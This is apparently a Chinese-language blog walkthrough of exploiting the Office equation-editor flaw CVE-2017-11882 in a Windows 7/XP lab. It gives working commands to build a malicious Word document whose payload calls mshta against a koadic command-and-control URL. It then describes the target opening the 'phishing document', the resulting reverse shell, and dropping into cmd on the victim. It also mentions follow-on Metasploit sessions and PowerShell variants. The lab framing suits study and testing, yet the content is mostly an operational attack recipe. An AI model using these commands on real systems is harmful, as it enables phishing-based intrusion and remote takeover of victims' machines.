测试环境:win7+kali+office 2007 xp+kali+office 2003
win7 ip:10.10.1.144 xp ip: 10.10.1.126 kali ip 10.10.1.67
PythonCommand109b_CVE-2017-11882 -c “cmd.exe /c calc.exe” -o test.doc
这条指令的意思是调用cmd并执行calc.exe(即计算器)
https://github.com/backlion/koadic.git
首先看一下koadic怎么用直接
Set lhost 10.10.1.67
Set lport 55555
Run
这儿需要注意的是生成的网址需要记住,以方便后面应用
接下来通过poc生成一个含有恶意代码的doc文件
python Command109b_CVE-2017-11882.py -c “mshtahttp://10.10.1.67:55555/Ly348” -o exploit.doc
接下来在目标主机打开钓鱼文档
切回koadic则发现发生变化
这个时候说明入侵成功并已经反弹shell
接下来在koadic执行zombies 0 切换到项目
接下来用cmdshell模块
输入 cmdshell 0
这就已经进去cmd了接下来可以愉快的玩耍了
提示一点 在这儿的Command109b_CVE-2017-11882是109字节限制的 当然也有43字节的
1.接接下来在靶机打开测试文档就好
2.切换回kali 会出现
说明已经建立链接了
接下来输入sessions -i 查看一下
接下来切换进入
这个时候就已经入侵到靶机了。
(之后的过程就和之前一样了,就不多啰嗦了)。
(ps:后两种是利用了powershell,所以在win7下测试的)
手机扫一扫
移动阅读更方便
你可能感兴趣的文章